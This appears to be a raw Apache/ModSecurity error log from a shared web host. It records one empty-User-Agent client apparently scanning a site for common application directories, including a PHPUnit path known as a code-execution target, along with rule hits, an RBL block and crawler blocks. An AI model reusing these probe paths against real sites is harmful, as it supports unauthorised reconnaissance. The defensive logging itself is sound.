[Tue May 26 17:03:29.010920 2026] [security2:error] [pid 851641:tid 851794] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCBp8QSN2510avp4j7gAAABc"]
[Tue May 26 17:03:29.011027 2026] [security2:error] [pid 851641:tid 851898] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/"] [unique_id "ahWFCBp8QSN2510avp4j7AAAAH8"]
[Tue May 26 17:03:29.439496 2026] [security2:error] [pid 851641:tid 851815] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCRp8QSN2510avp4j9QAAACw"]
[Tue May 26 17:03:29.439533 2026] [security2:error] [pid 851641:tid 851815] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCRp8QSN2510avp4j9QAAACw"]
[Tue May 26 17:03:29.439794 2026] [security2:error] [pid 851641:tid 851825] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/upload/image/"] [unique_id "ahWFCRp8QSN2510avp4j8wAAADY"]
[Tue May 26 17:03:29.902161 2026] [security2:error] [pid 851641:tid 851796] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCRp8QSN2510avp4kBwAAABk"]
[Tue May 26 17:03:29.902193 2026] [security2:error] [pid 851641:tid 851796] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCRp8QSN2510avp4kBwAAABk"]
[Tue May 26 17:03:29.948476 2026] [security2:error] [pid 851641:tid 851843] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/assets/images/"] [unique_id "ahWFCRp8QSN2510avp4kBQAAAEg"]
[Tue May 26 17:03:30.203484 2026] [security2:error] [pid 851641:tid 851830] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFCRp8QSN2510avp4kFAAAADs"]
[Tue May 26 17:03:30.347516 2026] [security2:error] [pid 851641:tid 851782] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFCRp8QSN2510avp4kEQAAAAs"]
[Tue May 26 17:03:30.715327 2026] [security2:error] [pid 851641:tid 851896] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFChp8QSN2510avp4kKAAAAH0"]
[Tue May 26 17:03:30.715596 2026] [security2:error] [pid 851641:tid 851813] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/Public/"] [unique_id "ahWFChp8QSN2510avp4kJgAAACo"]
[Tue May 26 17:03:31.132223 2026] [security2:error] [pid 851641:tid 851783] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFChp8QSN2510avp4kKwAAAAw"]
[Tue May 26 17:03:31.132520 2026] [security2:error] [pid 851641:tid 851898] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/vendor/"] [unique_id "ahWFChp8QSN2510avp4kKQAAAH8"]
[Tue May 26 17:03:31.579007 2026] [security2:error] [pid 851641:tid 851877] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFCxp8QSN2510avp4kNQAAAGo"], referer: http://preetishah.com/.next/build-manifest.json
[Tue May 26 17:03:31.628641 2026] [security2:error] [pid 851641:tid 851821] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCxp8QSN2510avp4kPwAAADI"]
[Tue May 26 17:03:31.628772 2026] [security2:error] [pid 851641:tid 851876] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/local/"] [unique_id "ahWFCxp8QSN2510avp4kPQAAAGk"]
[Tue May 26 17:03:32.126776 2026] [security2:error] [pid 851641:tid 851850] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCxp8QSN2510avp4kTQAAAE8"]
[Tue May 26 17:03:32.127130 2026] [security2:error] [pid 851641:tid 851809] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/modules/"] [unique_id "ahWFCxp8QSN2510avp4kSwAAACY"]
[Tue May 26 17:03:32.137389 2026] [security2:error] [pid 851641:tid 851843] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFCxp8QSN2510avp4kSgAAAEg"]
[Tue May 26 17:03:32.495291 2026] [security2:error] [pid 851641:tid 851797] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFDBp8QSN2510avp4kUwAAABo"]
[Tue May 26 17:03:32.545785 2026] [security2:error] [pid 851641:tid 851888] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDBp8QSN2510avp4kWgAAAHU"]
[Tue May 26 17:03:32.546125 2026] [security2:error] [pid 851641:tid 851858] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/Site/"] [unique_id "ahWFDBp8QSN2510avp4kWAAAAFc"]
[Tue May 26 17:03:32.924226 2026] [security2:error] [pid 851641:tid 851819] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDBp8QSN2510avp4kbwAAADA"]
[Tue May 26 17:03:32.924447 2026] [security2:error] [pid 851641:tid 851813] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/system/"] [unique_id "ahWFDBp8QSN2510avp4kbQAAACo"]
[Tue May 26 17:03:33.368347 2026] [autoindex:error] [pid 851641:tid 851772] [client 103.86.19.182:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:03:33.511476 2026] [security2:error] [pid 851641:tid 851816] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDRp8QSN2510avp4kkwAAAC0"]
[Tue May 26 17:03:33.511938 2026] [security2:error] [pid 851641:tid 851798] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/template/"] [unique_id "ahWFDRp8QSN2510avp4kjwAAABs"]
[Tue May 26 17:03:34.052494 2026] [security2:error] [pid 851641:tid 851826] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDRp8QSN2510avp4kqQAAADc"]
[Tue May 26 17:03:34.077432 2026] [security2:error] [pid 851641:tid 851891] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/shop/"] [unique_id "ahWFDRp8QSN2510avp4kpwAAAHg"]
[Tue May 26 17:03:34.180404 2026] [security2:error] [pid 851641:tid 851874] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFDRp8QSN2510avp4kowAAAGc"]
[Tue May 26 17:03:34.416460 2026] [security2:error] [pid 851641:tid 851822] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFDhp8QSN2510avp4krQAAADM"], referer: http://preetishah.com/build/manifest.json
[Tue May 26 17:03:34.621261 2026] [security2:error] [pid 851641:tid 851782] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDhp8QSN2510avp4ktgAAAAs"]
[Tue May 26 17:03:34.621560 2026] [security2:error] [pid 851641:tid 851863] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/files/"] [unique_id "ahWFDhp8QSN2510avp4ktAAAAFw"]
[Tue May 26 17:03:34.623102 2026] [security2:error] [pid 851641:tid 851746] [remote 74.7.241.58:37896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWFDhp8QSN2510avp4kvQAAUWg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:03:35.111474 2026] [security2:error] [pid 851641:tid 851777] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDhp8QSN2510avp4kyQAAAAY"]
[Tue May 26 17:03:35.111505 2026] [security2:error] [pid 851641:tid 851777] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDhp8QSN2510avp4kyQAAAAY"]
[Tue May 26 17:03:35.112068 2026] [security2:error] [pid 851641:tid 851846] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/admin/editor/"] [unique_id "ahWFDhp8QSN2510avp4kxwAAAEs"]
[Tue May 26 17:03:35.533178 2026] [security2:error] [pid 851641:tid 851798] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDxp8QSN2510avp4k1wAAABs"]
[Tue May 26 17:03:35.538678 2026] [security2:error] [pid 851641:tid 851793] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/include/"] [unique_id "ahWFDxp8QSN2510avp4k1QAAABY"]
[Tue May 26 17:03:35.636647 2026] [security2:error] [pid 851641:tid 851898] [client 157.55.39.192:47700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWFDxp8QSN2510avp4k0QAAAH8"]
[Tue May 26 17:03:35.706831 2026] [security2:error] [pid 851641:tid 851859] [client 103.86.19.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWFDxp8QSN2510avp4k5gAAAFg"], referer: https://www.ucdc.co.in/
[Tue May 26 17:03:36.016996 2026] [security2:error] [pid 851641:tid 851812] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFDxp8QSN2510avp4k7gAAACk"]
[Tue May 26 17:03:36.017428 2026] [security2:error] [pid 851641:tid 851811] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/Assets/"] [unique_id "ahWFDxp8QSN2510avp4k6wAAACg"]
[Tue May 26 17:03:36.411892 2026] [security2:error] [pid 851641:tid 851868] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEBp8QSN2510avp4lAgAAAGE"]
[Tue May 26 17:03:36.411948 2026] [security2:error] [pid 851641:tid 851868] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEBp8QSN2510avp4lAgAAAGE"]
[Tue May 26 17:03:36.421591 2026] [security2:error] [pid 851641:tid 851863] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/images/stories/"] [unique_id "ahWFEBp8QSN2510avp4lAAAAAFw"]
[Tue May 26 17:03:36.810221 2026] [security2:error] [pid 851641:tid 851894] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFEBp8QSN2510avp4lBQAAAHs"]
[Tue May 26 17:03:36.836705 2026] [security2:error] [pid 851641:tid 851880] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEBp8QSN2510avp4lCwAAAG0"]
[Tue May 26 17:03:36.837097 2026] [security2:error] [pid 851641:tid 851844] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/plugins/"] [unique_id "ahWFEBp8QSN2510avp4lCQAAAEk"]
[Tue May 26 17:03:36.993002 2026] [security2:error] [pid 851641:tid 851815] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFEBp8QSN2510avp4lEQAAACw"]
[Tue May 26 17:03:37.511550 2026] [security2:error] [pid 851641:tid 851820] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFERp8QSN2510avp4lHgAAADE"]
[Tue May 26 17:03:37.511933 2026] [security2:error] [pid 851641:tid 851893] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/php/"] [unique_id "ahWFERp8QSN2510avp4lHAAAAHo"]
[Tue May 26 17:03:37.775740 2026] [security2:error] [pid 851641:tid 851892] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFERp8QSN2510avp4lHwAAAHk"], referer: http://preetishah.com/.vite/manifest.json
[Tue May 26 17:03:37.947028 2026] [autoindex:error] [pid 851641:tid 851860] [client 138.199.19.160:45290] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:37.947759 2026] [security2:error] [pid 851641:tid 851860] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFERp8QSN2510avp4lKQAAAFk"]
[Tue May 26 17:03:38.304443 2026] [security2:error] [pid 851641:tid 851822] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEhp8QSN2510avp4lLAAAADM"]
[Tue May 26 17:03:38.304479 2026] [security2:error] [pid 851641:tid 851822] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEhp8QSN2510avp4lLAAAADM"]
[Tue May 26 17:03:38.304963 2026] [security2:error] [pid 851641:tid 851812] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/twentytwenty/"] [unique_id "ahWFEhp8QSN2510avp4lKgAAACk"]
[Tue May 26 17:03:38.864198 2026] [security2:error] [pid 851641:tid 851865] [client 114.119.157.183:41991] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/dfs-financing.html"] [unique_id "ahWFEhp8QSN2510avp4lSgAAAF4"], referer: https://whitesun.in/1hfq/dfs-financing.html
[Tue May 26 17:03:38.930742 2026] [security2:error] [pid 851641:tid 851799] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEhp8QSN2510avp4lRgAAABw"]
[Tue May 26 17:03:38.930790 2026] [security2:error] [pid 851641:tid 851799] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFEhp8QSN2510avp4lRgAAABw"]
[Tue May 26 17:03:38.937075 2026] [security2:error] [pid 851641:tid 851831] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/cache/"] [unique_id "ahWFEhp8QSN2510avp4lQwAAADw"]
[Tue May 26 17:03:38.937271 2026] [security2:error] [pid 851641:tid 851863] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFEhp8QSN2510avp4lPgAAAFw"]
[Tue May 26 17:03:39.523821 2026] [autoindex:error] [pid 851641:tid 851851] [client 138.199.19.160:45290] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/maint/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:39.524513 2026] [security2:error] [pid 851641:tid 851851] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFExp8QSN2510avp4lUQAAAFA"]
[Tue May 26 17:03:39.713514 2026] [security2:error] [pid 851641:tid 851781] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWFExp8QSN2510avp4lYAAAAAo"]
[Tue May 26 17:03:39.713999 2026] [security2:error] [pid 851641:tid 851793] [client 66.249.64.109:48697] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWFExp8QSN2510avp4lVAAAABY"]
[Tue May 26 17:03:39.835389 2026] [security2:error] [pid 851641:tid 851896] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFExp8QSN2510avp4lXgAAAH0"]
[Tue May 26 17:03:39.835429 2026] [security2:error] [pid 851641:tid 851896] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFExp8QSN2510avp4lXgAAAH0"]
